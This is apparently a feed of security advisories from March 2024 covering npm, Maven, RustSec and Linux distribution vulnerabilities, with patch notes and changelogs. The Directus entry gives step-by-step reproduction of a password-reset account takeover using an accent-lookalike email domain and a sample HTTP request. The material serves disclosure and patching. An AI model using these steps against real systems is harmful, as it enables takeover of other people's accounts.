01.03.2024 20:58:44	npm	[NPM:GHSA-QW9G-7549-7WG5] Directus has MySQL accent insensitive email matching (high)	## Password reset vulnerable to accent confusionThe password reset mechanism of the Directus backend is implemented in a way where combined with (specific, need to double check if i can work around) configuration in MySQL or MariaDB. As such, it allows attackers to receive a password reset email of a victim user, specifically having it arrive at a similar email address as the victim with a one or more characters changed to use accents. This is due to the fact that by default MySQL/MariaDB are configured for accent-insenstive and case-insensitve comparisons.MySQL weak comparison:```sqlselect 1 from directus_users where 'julian@cure53.de' = 'julian@cüre53.de';```This is exploitable due to an error in the API using the supplied email address for sending the reset password mail instead of using the email from the database.### Steps to reproduce:1. If the attacker knows the email address of the victim user, i.e., `julian@cure53.de`. (possibly just the domain could be enough for an educated guess)2. A off-by-one accented domain `cüre53.de` can be registered to be able to receive emails.3. With this email the attacker can request a password reset for `julian@cüre53.de`. ```httpPOST /auth/password/request HTTP/1.1Host: example.com[...]{"email":"julian@cüre53.de"}```4. The supplied email (julian@cüre53.de) gets checked against the database and will match the non-accented email `julian@cure53.de` and will continue to email the password reset link to the provided email address instead of the saved email address.5. With this email the attacker can log into the target account and use it for nefarious things### WorkaroundsShould be possible with collations but haven't been able to confirm this. ### References- https://www.monolune.com/articles/what-is-the-utf8mb4_0900_ai_ci-collation/- https://dev.mysql.com/doc/refman/8.0/en/charset-unicode-sets.html	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-QW9G-7549-7WG5
01.03.2024 18:57:57	npm	[NPM:GHSA-68C2-4MPX-QH95] Potential leakage of Sentry auth tokens by React Native SDK with Expo plugin (low)	### ImpactSDK versions between and including 5.16.0 and 5.19.0 allowed Sentry auth tokens to be set in the optional authToken configuration parameter, for debugging purposes. Doing so would result in the auth token being built into the application bundle, and therefore the auth token could be potentially exposed in case the application bundle is subsequently published.You may ignore this notification if you are not using `authToken` configuration parameter in your React Native SDK configuration or did not publish apps using this way of configuring the `authToken`.If you had set the `authToken` in the plugin config previously, and built and published an app with that config, you should [rotate your token](https://docs.sentry.io/product/accounts/auth-tokens/).### PatchesThe behavior that allowed setting an `authToken` parameter was fixed in SDK version 5.19.1 where, if this parameter was set, you will see a warning and the `authToken` would be removed before bundling the application.### Workarounds1. Remove `authToken` from the plugin configuration.2. If you had set the `authToken` in the plugin config previously, and built and published an app with that config, you should [rotate your token](https://docs.sentry.io/product/accounts/auth-tokens/).### References* [sentry-react-native 5.19.1 release notes](https://github.com/getsentry/sentry-react-native/releases/tag/5.19.1)* https://github.com/getsentry/sentry-docs/pull/9244	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-68C2-4MPX-QH95
01.03.2024 23:44:47	maven	[MAVEN:GHSA-9Q6V-RXMW-G3GH] Apache Ambari: Various Cross site scripting problems (moderate)	Lack of proper input validation and constraint enforcement in Apache Ambari prior to 2.7.8 Impact : As it will be stored XSS, Could be exploited to perform unauthorized actions, varying from data access to session hijacking and delivering malicious payloads. Users are recommended to upgrade to version 2.7.8 which fixes this issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-9Q6V-RXMW-G3GH
01.03.2024 18:58:16	npm	[NPM:GHSA-FFFG-CWC9-XVJ7] mongo-express Cross-site Request Forgery vulnerability (moderate)	In mongo-express 1.0.2, /admin allows CSRF, as demonstrated by deletion of a Collection.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-FFFG-CWC9-XVJ7
01.03.2024 18:57:13	npm	[NPM:GHSA-6JVG-HP25-42F6] Nteract Remote Code Execution vulnerability (moderate)	Nteract v.0.28.0 was discovered to contain a remote code execution (RCE) vulnerability via the Markdown link.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-6JVG-HP25-42F6
01.03.2024 02:00:00	oraclelinux	[ELSA-2024-12189] conmon security update (important)	conmon[2.1.3-8]- address CVE-2023-39326[2.1.3-7]- Resolve CVE-2023-39325[2.1.3-6]- Add ol8_baseos_latest, and ol9_baseos_latest, to Jenkinsfile[2.1.3-5]- Add systemd-devel as build requirement[2.1.3-4]- Add support ARM build[2.1.3.3]- Add OL9 support[2.1.3.2]- Update inline with Linux team building conmon for all but OL7.[2.1.3-1]- Added build scriptscri-o[1.25.5-1]- Added Oracle Specifile Files for cri-ocri-tools[1.25.0-3]- Resolve CVE-2023-39326[1.25.0-2]- Resolve CVE-2023-39325[1.25.0-1]- Added Oracle Specific Build Files for cri-toolsflannel-cni-plugin[1.0.1-4]- Resolve CVE-2023-39326[1.0.1-3]- Resolve CVE-2023-44487 and CVE-2023-39325[1.0.1-2]- Add support for Oracle Linux 9[1.0.1-1]- Added Oracle specific build files for Flannel CNI Pluginshelm[3.11.1-3]- address CVE-2023-39326[3.11.1-2]- address CVE-2023-44487 and CVE-2023-39325[3.11.1-1]- Added Oracle Specific build Filesistio[1.16.7-3]- Updated Golang to 1.20.12 to address CVE CVE-2023-39326[1.16.7-1]- Addresses CVE CVE-2023-35941, CVE-2023-35942, CVE-2023-35943, CVE-2023-35944.kata[1.12.1-17]- Include OL9 for kernel-uek-container (currently in UEKR7_developer_preview)[1.12.1-16]- Rebuild with golang 1.20.12[1.12.1-15]- Updated for kubernetes 1.27 and 1.28[1.12.1-14]- Updated to address CVE-2023-44487 and CVE-2023-39325[1.12.1-13]- Rebuild kata to fix timestamp issue[1.12.1-12]- Add support for ARM build[1.12.1-11]- Add OL9 support[1.12.1-10]- Updated kata-runtime version to work with more versions of kvm_utils[1.21.1-9]- updated cri-o and cri-tools versions to support olcne-1.6.0[1.12.1-7]- Updated kernel_uek_max and kernel_uek_container_max to 5.16 to support UEKR7 host and guest kernel. Note: installed kernel < 5.16.[1.12.1-6]- updated cri-o and cri-tools versions to support olcne-1.5.0[1.12.1-5]- updated cri-o and cri-tools versions to support kubernetes-1.23[1.12.1-4]- update kata-image versions- update kernel-uek-container version to kernel-uek-container-5.4.17-2136.306.1.3[1.21.1-3]- Support k8s 1.21.6- updated kernel-uek-container version- updated kata-image versions- added buildhost variable[1.12.1-2]- Golang 1.15.9[1.12.1-1]- Updated to kata 1.12.1- Updated guest kernel (kernel-uek-container) minimum version to UEK6U2 (5.4.17-2102.200.7)kata-agent[1.12.1-11]- Rebuild with -11 tag[1.12.1-10]- Updated Golang to 1.20.12 to address CVE CVE-2023-39326[1.12.1-9]- Updated to address CVE-2023-44487 and CVE-2023-39325[1.12.1-8]- Remove build_date global variable in kata-image specfile[1.12.1-7]- Add support for ARM build[1.12.1-6]- Add OL9 support[1.12.1-4]- Updated THIRD_PARTY_LICENSES.txt generated using pls attribution-helper[1.12.1-3]- updated golang version- added buildhost variable[1.12.1-2]- Golang 1.15.9[1.12.1-1]- Added Oracle Specific Build Files for kata-agentkata-image[1.12.1-11]- Rebuild with -11 tag[1.12.1-10]- Updated Golang to 1.20.12 to address CVE CVE-2023-39326[1.12.1-9]- Updated to address CVE-2023-44487 and CVE-2023-39325[1.12.1-8]- Remove build_date global variable in specfile[1.12.1-7]- Add support for ARM build[1.12.1-6]- Restore OL7 and bump release[1.12.1-5]- Add support for Oracle Linux 9[1.12.1-4]- build for kata-agent-1.12.1-4[1.12.1-3]- updated golang version- added buildhost variable[1.12.1-2]- Golang 1.15.9[1.12.1-1]- Added Oracle Specific Build Files for kata-imagekata-ksm-throttler[1.12.1-11]- Rebuild with -11 tag[1.12.1-10]- Updated Golang to 1.20.12 to address CVE CVE-2023-39326[1.12.1-9]- Updated to address CVE-2023-44487 and CVE-2023-39325[1.12.1-8]- Bump release inline with other kata packages for fixing timestamp issue[1.12.1-7]- Add support for ARM build[1.12.1-6]- Bump releaase inline with others for reversion of removal of OL7.[1.12.1-5]- Add support for Oracle Linux 9[1.12.1-4]- Updated THIRD_PARTY_LICENSES.txt generated using pls attribution-helper[1.12.1-3]- updated golang version- added buildhost variable[1.12.1-2]- Golang 1.15.9[1.12.1-1]- Added Oracle Specific Build Files for kata-ksm-throttlerkata-proxy[1.12.1-11]- Rebuild with -11 tag[1.12.1-10]- Updated Golang to 1.20.12 to address CVE CVE-2023-39326[1.12.1-9]- Updated to address CVE-2023-44487 and CVE-2023-39325[1.12.1-8]- Bump release inline with other kata packages for fixing timestamp issue[1.12.1-7]- Add support for ARM build[1.12.1-6]- Revert OL7 removal[1.12.1-5]- Add support for Oracle Linux 9[1.12.1-4]- Updated THIRD_PARTY_LICENSES.txt generated using pls attribution-helper[1.12.1-3]- updated golang version- added buildhost variable[1.12.1-2]- Golang 1.15.9[1.12.1-1]- Added Oracle Specific Build Files for kata-proxykata-runtime[1.12.1-11]- Rebuild with -11 tag[1.12.1-10]- Updated Golang to 1.20.12 to address CVE CVE-2023-39326[1.12.1-9]- Updated to address CVE-2023-44487 and CVE-2023-39325[1.12.1-8]- Bump release inline with other kata packages for fixing timestamp issue[1.12.1-7]- Add support for ARM build[1.12.1-6]- Add OL9 support[1.12.1-5]- Updated qemu-kvm machine options to work with more versions of kvm_utils[1.12.1-4]- Updated THIRD_PARTY_LICENSES.txt generated using pls attribution-helper[1.12.1-3]- updated golang version- added buildhost variable[1.12.1-2]- Golang 1.15.9[1.12.1-1]- Added Oracle Specific Files For kata-runtimekata-shim[1.12.1-11]- Rebuild with -11 tag[1.12.1-10]- Updated Golang to 1.20.12 to address CVE CVE-2023-39326[1.12.1-9]- Updated to address CVE-2023-44487 and CVE-2023-39325[1.12.1-8]- Bump release inline with other kata packages for fixing timestamp issue[1.12.1-7]- Add support for ARM build[1.12.1-6]- Bump releaase inline with others for reversion of removal of OL7.[1.12.1-5]- Add support for Oracle Linux 9[1.12.1-4]- Updated THIRD_PARTY_LICENSES.txt generated using pls attribution-helper[1.12.1-3]- updated golang version- added buildhost variable[1.12.1-2]- Golang 1.15.9[1.12.1-1]- Added Oracle Specific Build Files for kata-shimkubernetes[1.25.15-2]- Address CVE-2023-39326 by upgrading golang to 1.20.12[1.25.15-1]- Added Oracle specific build files for Kuberneteskubernetes-cni[1.0.1-4]- address CVE-2023-39326[1.0.1-3]- Resolve CVE-2023-44487 and CVE-2023-39325[1.0.1-2]- Updated THIRD_PARTY_LICENSES.txt generated using pls attribution-helper[1.0.1-1]- Added Oracle specific build files for Kubernetes CNIkubernetes-cni-plugins[1.0.1-5]- address CVE-2023-39326[1.0.1-3]- Resolve CVE-2023-44487 and CVE-2023-39325[1.0.1-3]- Updated THIRD_PARTY_LICENSES.txt generated using pls attribution-helper[1.0.1-2]- Add flannel-cni-plugins as a dependency[1.0.1-1]- Added Oracle specific build files for Kubernetes CNI Pluginsolcne[1.6.6-3]- Fixed pod-network:calico update[1.6.6-2]- Added conmon resource to kubernetes module[1.6.6-1]- Rebuilt modules, and components, with golang 1.20.12 to address CVE-2023-39326- Updated CRI-O to v1.25.5[1.6.5-9]- Mark container-registry as updatable[1.6.5-9]- update metallb 0.12.1 to address CVE-2023-44487 and CVE-2023-39325[1.6.5-8]- Update externalip-webhook 1.0.0-3 to address CVE-2023-44487, CVE-2023-39325[1.6.5-7]- Update multus-cni 3.9.3 to address CVE-2023-44487 and CVE-2023-39325[ - 1.6.5-6]- Update rook-1.10.9 to address CVE-2023-44487, CVE-2023-39325[1.6.5-5]- Update Istio, Grafana, Prometheus, and Kubernetes-dashboard to address CVE's- CVE-2023-44487- CVE-2023-39325[1.6.5-4]- Update kubernetes and components to address golang CVE-2023-44487, CVE-2023-39325[1.6.5-3]- update configmap-registry to 1.28.0 to address CVE-2023-44487 and CVE-2023-39325[1.6.5-2]- Update kubevirt 0.58.0 to address CVE-2023-44487 and CVE-2023-39325[1.6.5-1]- Update calico image versions to address golang CVE-2023-44487, CVE-2023-39325[1.6.4-1]- Fix GetNodeByAddr string comparison- hostnames case insensitve comparison[1.6.3-1]- Add Istio-1.16.7 to address CVE's- CVE-2023-35941- CVE-2023-35942- CVE-2023-35943- CVE-2023-35944[1.6.2-1]- CVE-2023-2727, CVE-2023-2728 Kubernetes upgraded to 1.25.11- Add all modules to registry-image-helper- update yq to 4.x[1.6.1-9]- Updated the CVE ID's in Istio-1.16.4 changelog entry[1.6.1-8]- Update Istio config to include 1.15.7 to support upgrade from 1.5.x to 1.6.x[1.6.1-7]- Bugfix:Append a slash in oci-instance-metada query url[1.6.1-6]- Fixed helm installation in OLCNE upgrade[1.6.1-5]- Deprecate oci-private-key <path-on-control-plane-nodes> in favour of oci-private-key-file <path-on-operatpr-node>- Updated olcne_version argument in olcnectl provision to support <major.minor.patch>[1.6.1-4]- Update Istio version to 1.16.4 to address CVE's- CVE-2023-27496- CVE-2023-27488- CVE-2023-27493- CVE-2023-27492- CVE-2023-27491- CVE-2023-27487[1.6.1-3]- Resolved the issue to install multiple network cards using multus[1.6.1-2]- Update kubelet for upstream runc misc cgroups patch[1.6.1-1]- Fix the bug olcnectl provision fails if ol8_developer does not exist[1.6.0-4]- Removed PodSecurityPolicy from the Grafana Helm chart due to the removal of the API in Kubernetes 1.25- Fixed an issue where creating an instance of the Istio module without Helm already installed would fail[1.6.0-3]- Move template to olcne-api-server and provide default calico config[1.6.0-2]- Update KubeVirt version to 0.58.0[1.6.0-1]- Update Kubernetes version to 1.25.7- Update Helm version to 3.11.1- Update Istio version to 1.16.2- Add Calico CNI 3.25- Add Multus CNI 3.9.3- Technical preview for KubeVirt 0.52.0- Technical preview for Rook 1.10.9- Add subcommand to olcnectl that lists version information for modules- Add support for --control-plane-nodes argument to the Kubernetes module for specifying control plane nodes- olcnectl provision can now update existing module instances- Deprecate Helm module in favor of automatically installing Helm with Kubernetes- Deprecate --master-nodes argument to the Kubernetes module- Deprecate Kata container runtime- Deprecate Flannel CNI- Deprecate GlusterFS CSI Driver[1.5.11-1]- Expose metrics endpoints for kube-system services- Support installation with or without firewalld running- Open port 9100 on nodes when installing Kubernetes module- Make disable swap persist after reboot of control plane node[1.5.10-2]- Update istio to 1.15.3 to address Istio CVE-2022-392787[1.5.9-1]- Fix a regression during provisioning where arguments for the externalip restriction webhook are handled incorrectly[1.5.8-4]- Fix 1.21 kubernetes version to align with last upstream release[1.5.8-3]- Increase timeout value for update module[1.5.8-2]- Resolve kubernetes CVE-2022-3294 & CVE-2022-3162 for version 1.24- Resolve kubernetes CVE-2022-3294 & CVE-2022-3162 for version 1.23- Resolve kubernetes CVE-2022-3294 & CVE-2022-3162 for version 1.22- Resolve kubernetes CVE-2022-3294 & CVE-2022-3162 for version 1.21[1.5.8-1]- Improve error reporting and logging when using olcnectl provision- Environment creation is now idempotent[1.5.7-6]- Unpinned podman for OL7[1.5.7-5]- Updated the kubernetes-dashboard version to v2.5.1 in the registry-image-helper.sh script for kubernetes-1.24.5[1.5.7-4]- Upgraded helm-3.7.1 to 3.9.4[1.5.7-3]- Resolved kubernetes-1.22.14 upgrade issue[1.5.7-1]- Upgrade Kubernetes to 1.24.5- Upgrade Istio to 1.14.3- Update OCI-CCM to 1.24.0 for kubernetes 1.24- Update kubernetes-dashboard to v2.5.1- Added support for custom profiles to the Istio module- Added support for multiple instances of the Istio module with independent profiles- Implemented automation within olcnectl for provisioning of Platform components and modules for existing compute resources[1.5.6-1]- Upgraded kubernetes-1.23.7 to 1.23.11, 1.22.8 to 1.22.14 and 1.21.6 to 1.21.14- Resolve Kubernetes CVE-2022-3172 for version 1.21- Resolve Kubernetes CVE-2022-3172 for version 1.22- Resolve Kubernetes CVE-2022-3172 for version 1.23[1.5.5-1]- Upgrade Istio from 1.13.5 to 1.13.7 to resolve the CVE-2022-31045[1.5.4-3]- Fix bug in gen-certs-helper script to change permission of node.key to allow opc user to copy over[1.5.4-2]- Istio CVE-2022-31045, CVE-2022-29225, CVE-2022-29224,CVE-2022-29226,CVE-2022-29228,CVE-2022-29227[1.5.4-1]- Upgrade Kubernetes to 1.23.7[1.5.3-1]- Address qemu CVE-2022-26353, CVE-2021-3748[1.5.2-1]- Excluded unnecessary directories from k8s backup files[1.5.1-1]- Fixed the bug in fetching node metadata for non-cloud nodes[1.5.0-2]- Upgrade Helm to 3.7.1-2[1.5.0-2]- fix null pointer exception in systemd service state validation[1.5.0-1]- Introduce support for compact Kubernetes clusters- Introduce MetalLB- Introduce Oracle Cloud Infrastructure Cloud Controller Manager- Improved log messages in Platform API Server and Platform Agent- Upgrade Kubernetes to 1.22.8- Upgrade Istio to 1.13.2- Renamed the oci-csi module to oci-ccm[1.5.0-20.alpha]- Update istio-1.13.2 grafana to 7.5.15[1.5.0-14.alpha]- Metallb fix[1.5.0-11.alpha]- Remove module directories when olcne rpm is uninstalled[1.5.0-10.alpha]- OCI CCM 0.13.0[1.5.0-9.alpha]- Reworked log messages[1.5.0-8.alpha]- Update Istio to 1.13.2(prometheus-2.31.1, grafana-8.4.6)[1.5.0-7.alpha]- Update Istio to 1.12.6(prometheus-2.30.1, grafana-7.5.15)[1.5.0-6.alpha]- Update to k8s 1.22 with golang 1.17[1.5.0-5.alpha]- Update internal docs for oci-ccm module[1.5.0-4.alpha]- Extend oci-ccm module to support load balancer[1.5.0-3.alpha]- Firewall pre-req[1.5.0-2.alpha]- Ensure that config map settings needed by metallb is preserved during k8s upgrade[1.5.0-1.alpha]- Metallb module[1.4.1-14]- Added 1.4 extra images to registry-image-helper.sh script[1.4.1-13]- Update sudoers file and changed its permissions to '0440'[1.4.1-12]- Update olcne-kubernetes.md file for 'compact' flag[1.4.1-11]- Ensure that the order of items in an upgraded config file is stable with respect to the original file[1.4.1-10]- Ensure that old olcnectl config files are upgraded[1.4.1-9]- Rename oci-csi module to oci-ccm and add support for oci-ccm loadbalancer creation[1.4.1-8]- Make 'compact' flag updatable[1.4.1-7]- Introduce 'compact' that enables control-plane nodes to run any workloads[1.4.1-6]- Ability to label 1 or more kubernetes nodes[1.4.1-5]- Fixed a bug where specifying a port in the container-registry argument to the Kubernetes module would result in pods not being able to start.[1.4.1-4]- Update helm to 3.7.1[1.4.1-3]- Update versions to Istio-1.12.2, prometheus-2.31.1 and grafana-7.5.11[1.4.1-2]- Allow loadbalancer to be configured regardless of security list mode[1.4.0-4]- Fix bug in initialising certs manager when environment name not mentioned[1.4.0-3]- Fix bug in fetching report for multi-environment[1.4.0-2]- Pause image is 3.4.1[1.4.0-1]- CSI plugin- Reports feature- Kubernetes-1.20.6 to Kubernetes-1.21.6 upgrade- Istio-1.9.4 to Istio-1.11.4 upgrade- Component upgrades- Config file feature[1.3.0-13]- Fix iptables issue when running on OL7 host using OL8 image[1.3.0-12]- Address CVE's ISTIO-SECURITY-2021-003, ISTIO-SECURITY-2021-005, ISTIO-SECURITY-2021-006, ISTIO-SECURITY-2021-007[1.3.0-11]- Fixed yaml file to stop olcne-nginx and keepalived services at uninstall [Orabug: 32296282][1.3.0-10]- Fixed missing double semicolon in registry image helper[1.3.0-9]yq[4.34.1-4]- Update Golang to 1.20.12 to address CVE-2023-39326[4.34.1-3]- address CVE-2023-44487 and CVE-2023-3932A[4.34.1-2]- Add support for ARM build[4.34.1-1]- Added Oracle specific build files	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-12189
01.03.2024 18:56:53	maven	[MAVEN:GHSA-VR64-R9QJ-H27F] Clojure Denial of Service vulnerability (moderate)	An issue in Clojure versions 1.2.0 to 1.12.0-alpha5 allows an attacker to cause a denial of service (DoS) via the `clojure.core$partial$fn__5920` function.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-VR64-R9QJ-H27F
01.03.2024 22:49:42	maven	[MAVEN:GHSA-RGHC-9FHX-H32M] Apache Ambari: authenticated users could perform command injection to perform RCE (high)	Malicious code injection in Apache Ambari in prior to 2.7.8. Users are recommended to upgrade to version 2.7.8, which fixes this issue.Impact:A Cluster Operator can manipulate the request by adding a malicious code injection and gain a root over the cluster main host.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-RGHC-9FHX-H32M
01.03.2024 05:33:41	rustsec	[RUSTSEC-2024-0018] ObjectPool creates uninitialized memory when freeing objects	As of version 0.6.0, the ObjectPool explicitly creates an uninitialized instance of itstype parameter when it attempts to free an object, and swaps it into the storage. Thiscauses instant undefined behavior due to reading the uninitialized memory in order towrite it to the pool storage.Extremely basic usage of the crate can trigger this issue, e.g. this code from a doctest:```rustuse crayon::prelude::*;application::oneshot().unwrap();let mut params = MeshParams::default();let mesh = video::create_mesh(params, None).unwrap();// Deletes the mesh object.video::delete_mesh(mesh); // <-- UB```The Clippy warning for this code was silenced in commit c2fde19caf6149d91faa504263f0bc5cafc35de5.Discovered via https://asan.saethlin.dev/ub?crate=crayon&version=0.7.1	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0018
01.03.2024 18:55:54	npm	[NPM:GHSA-RM97-X556-Q36H] sanitize-html Information Exposure vulnerability (moderate)	Versions of the package sanitize-html before 2.12.1 are vulnerable to Information Exposure when used on the backend and with the style attribute allowed, allowing enumeration of files in the system (including project dependencies). An attacker could exploit this vulnerability to gather details about the file system structure and dependencies of the targeted server.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-RM97-X556-Q36H
01.03.2024 07:06:26	maven	[MAVEN:GHSA-44JG-JGJX-3XG5] Liferay Portal's Dynamic Data Mapping module's DDMForm and Liferay DXP vulnerable to stored Cross-site Scripting (critical)	Stored cross-site scripting (XSS) vulnerability in the Dynamic Data Mapping module's DDMForm in Liferay Portal 7.2.0 through 7.4.3.4, and older unsupported versions, and Liferay DXP 7.4.13, 7.3 before update 4, 7.2 before fix pack 17, and older unsupported versions allows remote authenticated users to inject arbitrary web script or HTML via the instanceId parameter.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-44JG-JGJX-3XG5
02.03.2024 23:32:13	rubysec	[RUBYSEC:JSON-JWT-2023-51774] json-jwt allows bypass of identity checks via a sign/encryption confusion attack	The json-jwt (aka JSON::JWT) gem versions 1.16.5 and below sometimes allowsbypass of identity checks via a sign/encryption confusion attack.For example, JWE can sometimes be used to bypass JSON::JWT.decode.	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:JSON-JWT-2023-51774
03.03.2024 02:00:00	gentoo	[GLSA-202403-02] Blender: Multiple Vulnerabilities (normal)	Multiple vulnerabilities have been discovered in Blender, the worst of which could lead to arbitrary code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202403-02
03.03.2024 02:00:00	gentoo	[GLSA-202403-01] Tox: Remote Code Execution (normal)	A vulnerability has been discovered in Tox which may lead to remote code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202403-01
03.03.2024 02:00:00	gentoo	[GLSA-202403-03] UltraJSON: Multiple Vulnerabilities (normal)	Multiple vulnerabilities have been discovered in UltraJSON, the worst of which could lead to key confusion and value overwriting.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202403-03
05.03.2024 00:16:36	ubuntu	[USN-6653-4] Linux kernel (GKE) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6653-4
04.03.2024 22:43:50	npm	[NPM:GHSA-FQG8-VFV7-8FJ8] JSONata expression can pollute the "Object" prototype (high)	### ImpactIn JSONata versions `>= 1.4.0, < 1.8.7` and `>= 2.0.0, < 2.0.4`, a malicious expression can use the [transform operator](https://docs.jsonata.org/other-operators#-------transform) to override properties on the `Object` constructor and prototype. This may lead to denial of service, remote code execution or other unexpected behavior in applications that evaluate user-provided JSONata expressions.### PatchThis issue has been fixed in JSONata versions `>= 1.8.7` and `>= 2.0.4`. Applications that evaluate user-provided expressions should update ASAP to prevent exploitation. The following patch can be applied if updating is not possible.```patch--- a/src/jsonata.js+++ b/src/jsonata.js@@ -1293,6 +1293,13 @@ var jsonata = (function() { } for(var ii = 0; ii < matches.length; ii++) { var match = matches[ii];+ if (match && (match.isPrototypeOf(result) \|\| match instanceof Object.constructor)) {+ throw {+ code: "D1010",+ stack: (new Error()).stack,+ position: expr.position+ };+ } // evaluate the update value for each match var update = await evaluate(expr.update, match, environment); // update must be an object@@ -1539,7 +1546,7 @@ var jsonata = (function() { if (typeof err.token == 'undefined' && typeof proc.token !== 'undefined') { err.token = proc.token; }- err.position = proc.position;+ err.position = proc.position \|\| err.position; } throw err; }@@ -1972,6 +1979,7 @@ var jsonata = (function() { "T1007": "Attempted to partially apply a non-function. Did you mean ${{{token}}}?", "T1008": "Attempted to partially apply a non-function", "D1009": "Multiple key definitions evaluate to same key: {{value}}",+ "D1010": "Attempted to access the Javascript object prototype", // Javascript specific "T1010": "The matcher function argument passed to function {{token}} does not return the correct object structure", "T2001": "The left side of the {{token}} operator must evaluate to a number", "T2002": "The right side of the {{token}} operator must evaluate to a number",```### Referenceshttps://github.com/jsonata-js/jsonata/releases/tag/v2.0.4### CreditThank you to Albert Pedersen of Cloudflare for disclosing this issue.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-FQG8-VFV7-8FJ8
04.03.2024 22:43:49	npm	[NPM:GHSA-R4PF-3V7R-HH55] electron-builder's NSIS installer - execute arbitrary code on the target machine (Windows only) (high)	### ImpactWindows-Only: The NSIS installer makes a system call to open cmd.exe via NSExec in the `.nsh` installer script. NSExec by default searches the current directory of where the installer is located before searching `PATH`. This means that if an attacker can place a malicious executable file named cmd.exe in the same folder as the installer, the installer will run the malicious file.### PatchesFixed in https://github.com/electron-userland/electron-builder/pull/8059### WorkaroundsNone, it executes at the installer-level before the app is present on the system, so there's no way to check if it exists in a current installer.### Referenceshttps://cwe.mitre.org/data/definitions/426.htmlhttps://cwe.mitre.org/data/definitions/427	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-R4PF-3V7R-HH55
04.03.2024 18:14:41	ubuntu	[USN-6674-2] Django vulnerability	Django could be made to consume resources or crash if it received speciallycrafted network traffic.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6674-2
04.03.2024 17:04:24	ubuntu	[USN-6674-1] Django vulnerability	Django could be made to consume resources or crash if it received speciallycrafted network traffic.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6674-1
04.03.2024 16:23:13	ubuntu	[USN-6673-1] python-cryptography vulnerabilities (high)	Several security issues were fixed in python-cryptography.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6673-1
04.03.2024 13:09:06	ubuntu	[USN-6672-1] Node.js vulnerabilities (high)	Several security issues were fixed in Node.js.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6672-1
04.03.2024 05:02:03	ubuntu	[USN-6669-1] Thunderbird vulnerabilities (high)	Several security issues were fixed in Thunderbird.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6669-1
04.03.2024 02:00:00	cisa	[CISA-2024:0304] CISA Adds One Known Exploited Vulnerability to Catalog (high)	CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0304
04.03.2024 02:00:00	debian	[DSA-5635-1] yard (medium)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5635-1
04.03.2024 02:00:00	mozilla	[MFSA-2024-11] Security Vulnerabilities fixed in Thunderbird 115.8.1 (high)	- CVE-2024-1936: Leaking of encrypted email subjects to other conversations (high)The encrypted subject of an email message could be incorrectly and permanently assigned to an arbitrary other email message in Thunderbird's local cache. Consequently, when replying to the contaminated email message, the user might accidentally leak the confidential subject to a third party. While this update fixes the bug and avoids future message contamination, it does not automatically repair existing contaminations. Users are advised to use the repair folder functionality, which is available from the context menu of email folders, which will erase incorrect subject assignments.	https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-11
04.03.2024 02:00:00	redhat	[RHSA-2024:1063] edk2 security update (important)	EDK (Embedded Development Kit) is a project to enable UEFI support for Virtual Machines. This package contains a sample 64-bit UEFI firmware for QEMU and KVM. Security Fix(es):* edk2: Buffer overflow in the DHCPv6 client via a long Server ID option (CVE-2023-45230)* edk2: Buffer overflow when processing DNS Servers option in a DHCPv6 Advertise message (CVE-2023-45234)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1063
04.03.2024 19:51:31	rustsec	[RUSTSEC-2024-0019] Tokens for named pipes may be delivered after deregistration	## ImpactWhen using named pipes on Windows, mio will under some circumstances return invalid tokens that correspond to named pipes that have already been deregistered from the mio registry. The impact of this vulnerability depends on how mio is used. For some applications, invalid tokens may be ignored or cause a warning or a crash. On the other hand, for applications that store pointers in the tokens, this vulnerability may result in a use-after-free.For users of Tokio, this vulnerability is serious and can result in a use-after-free in Tokio.The vulnerability is Windows-specific, and can only happen if you are using named pipes. Other IO resources are not affected.## Affected versionsThis vulnerability has been fixed in mio v0.8.11.All versions of mio between v0.7.2 and v0.8.10 are vulnerable.Tokio is vulnerable when you are using a vulnerable version of mio AND you are using at least Tokio v1.30.0. Versions of Tokio prior to v1.30.0 will ignore invalid tokens, so they are not vulnerable.## WorkaroundsVulnerable libraries that use mio can work around this issue by detecting and ignoring invalid tokens.## Technical detailsWhen an IO resource registered with mio has a readiness event, mio delivers that readiness event to the user using a user-specified token. Mio guarantees that when an IO resource is [deregistered](https://docs.rs/mio/latest/mio/struct.Registry.html#method.deregister), then it will never return the token for that IO resource again. However, for named pipes on windows, mio may sometimes deliver the token for a named pipe even though the named pipe has been previously deregistered.This vulnerability was originally reported in the Tokio issue tracker: [tokio-rs/tokio#6369](https://github.com/tokio-rs/tokio/issues/6369) This vulnerability was fixed in: [tokio-rs/mio#1760](https://github.com/tokio-rs/mio/pull/1760)Thank you to [@rofoun](https://github.com/rofoun) and [@radekvit](https://github.com/radekvit) for discovering and reporting this issue.	